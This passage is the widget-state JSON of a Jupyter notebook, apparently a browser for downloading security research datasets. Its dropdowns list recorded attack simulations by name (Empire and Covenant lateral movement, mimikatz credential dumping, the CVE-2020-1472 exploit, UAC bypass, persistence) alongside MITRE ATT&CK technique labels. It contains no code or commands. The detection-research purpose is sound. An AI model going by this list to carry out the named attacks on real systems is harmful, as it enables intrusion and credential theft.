"small.windows.lateral_movement.network.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpwmi_create_dcerpc_wmi", 
"small.windows.lateral_movement.network.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.network.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.network.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.network.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.network.empire_psremoting_stager", "small.windows.lateral_movement.network.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.network.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.network.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_elevated_user", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_standard_user", "small.windows.persistence.host.empire_schtasks_creation_execution_elevated_user", "small.windows.persistence.host.empire_schtasks_creation_standard_user", "small.windows.persistence.host.empire_wmi_local_event_subscriptions_elevated_user", "small.windows.privilege_escalation.host.empire_uac_shellapi_fodhelper" ], "description": "Select an item", "index": 0, "layout": "IPY_MODEL_52b24cb8d1f74e38a17455c6348de176", "style": "IPY_MODEL_f5e596a77c8b47998b9dfd0439a51c58" } }, "60c77bd887e94f1eadfc172d87239b93": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Download", "layout": "IPY_MODEL_80a6a1491f3d4eadb10acc6ae946a6ce", "style": "IPY_MODEL_ba1fe8518d564de3b6bc0ab913ed1eaa" } }, "63a6203566e9421d86229af44063e735": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "647f49b51caa47a7acc4adf675dfd47b": { "model_module": "@jupyter-widgets/base", 
"model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "6573400329f84022af769bb793389703": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "1px solid", "margin": "5px", "padding": "10px", "width": "80%" } }, "678bd81546ab45ebb4d708bc59ec37c3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "modification_date", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_15544c32789444f2a5c22624ef1c1a36", "value": "2020-09-13 00:00:00" } }, "7044344294cb4ecdbe044c53779be27a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "attacks", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_ece2bc63290248a0badfad760907811c", "value": "

Mitre Technique T1078 (sub: 004) : Valid Accounts

Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion

Mitre Technique T1530 : Data from Cloud Storage Object

Mitre Tactics: TA0009: Collection" } }, "705f73c7e2404583b800026f6f76fb2f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "707792065e3b43c3910a84efa28ab8ce": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "small.aws.collection.ec2_proxy_s3_exfiltration", "small.windows.collection.host.msf_record_mic", "small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.host.empire_mimikatz_extract_keys", "small.windows.credential_access.host.empire_mimikatz_logonpasswords", "small.windows.credential_access.host.empire_mimikatz_lsadump_patch", "small.windows.credential_access.host.empire_mimikatz_sam_access", "small.windows.credential_access.host.empire_over_pth_patch_lsass", "small.windows.credential_access.host.empire_powerdump_sam_access", "small.windows.credential_access.host.empire_shell_reg_dump_sam", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt", "small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump", "small.windows.credential_access.network.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_ptt", "small.windows.defense_evasion.host.covenant_installutil", 
"small.windows.defense_evasion.host.empire_dllinjection_LoadLibrary_CreateRemoteThread", "small.windows.defense_evasion.host.empire_launcher_sct_regsvr32", "small.windows.defense_evasion.host.empire_monologue_netntlm_downgrade", "small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.defense_evasion.host.empire_psinject_PEinjection", "small.windows.defense_evasion.host.empire_enable_rdp.tar", "small.windows.defense_evasion.host.empire_wdigest_downgrade.tar", "small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.discovery.host.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.host.empire_find_localadmin_smb_svcctl_OpenSCManager", "small.windows.discovery.host.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.host.empire_shell_net_local_users", "small.windows.discovery.host.empire_shell_net_localgroup_administrators", "small.windows.discovery.host.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.host.empire_shell_samr_EnumDomainUsers", "small.windows.discovery.network.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.network.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.network.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.network.empire_shell_samr_EnumDomainUsers", "small.windows.execution.host.empire_launcher_vbs", "small.windows.lateral_movement.host.covenant_copy_smb_CreateRequest", "small.windows.lateral_movement.host.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.host.covenant_dcom_registerxll", "small.windows.lateral_movement.host.covenant_psremoting_command", "small.windows.lateral_movement.host.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_create_dcerpc_smb_svcctl", 
"small.windows.lateral_movement.host.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.host.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.host.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.host.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.host.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.host.empire_psremoting_stager", "small.windows.lateral_movement.host.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.host.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.host.empire_wmic_add_user_backdoor", "small.windows.lateral_movement.host.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.lateral_movement.network.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.network.covenant_dcom_registerxll", "small.windows.lateral_movement.network.covenant_psremoting_command", "small.windows.lateral_movement.network.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.network.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.network.empire_dcom_shellwindows_stager", 
"small.windows.lateral_movement.network.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.network.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.network.empire_psremoting_stager", "small.windows.lateral_movement.network.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.network.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.network.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_elevated_user", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_standard_user", "small.windows.persistence.host.empire_schtasks_creation_execution_elevated_user", "small.windows.persistence.host.empire_schtasks_creation_standard_user", "small.windows.persistence.host.empire_wmi_local_event_subscriptions_elevated_user", "small.windows.privilege_escalation.host.empire_uac_shellapi_fodhelper" ], "description": "Select an item", "index": 0, "layout": "IPY_MODEL_561949ffe1954ada877c9e9cb7185fc6", "style": "IPY_MODEL_cf785e6f037b4e56825395070ea6e151" } }, "707d9649d0cc41f6a76df6f9cde75616": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "70fd3df0081040cb8e665f596911aca0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "726eb5a7dd734f75abbe80d9a0683241": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "734b47ff6f5b4746a590006e099e471e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_81fe0e98cb814ae6aa47d54c0349b63e", "IPY_MODEL_f37054c182ce4fa699afffa54a49cd35", 
"IPY_MODEL_c64e723f0df44dab86d4ffde1141aeda" ], "layout": "IPY_MODEL_70fd3df0081040cb8e665f596911aca0" } }, "79a4915d0be448a597e5817000937c48": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "7aedafe1ed574aecaabec6d4f61416da": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "layout": "IPY_MODEL_a78cda946ab54ee6bfe2247d3efa94a2", "style": "IPY_MODEL_79a4915d0be448a597e5817000937c48", "value": " 57/57 [05:14<00:00, 5.52s/ files]" } }, "7d5ebde1c581446798e90021ccc34191": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "7df2c107b2bb486c8e6d84d634323c3f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "80595b0b60f5412ebc93246191b6e337": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "attacks", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_3e66b46fc13346358e05316f28219477", "value": "

Mitre Technique T1078 (sub: 004) : Valid Accounts

Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion

Mitre Technique T1530 : Data from Cloud Storage Object

Mitre Tactics: TA0009: Collection" } } }, "version_major": 2, "version_minor": 0 } } }, "nbformat": 4, "nbformat_minor": 4 }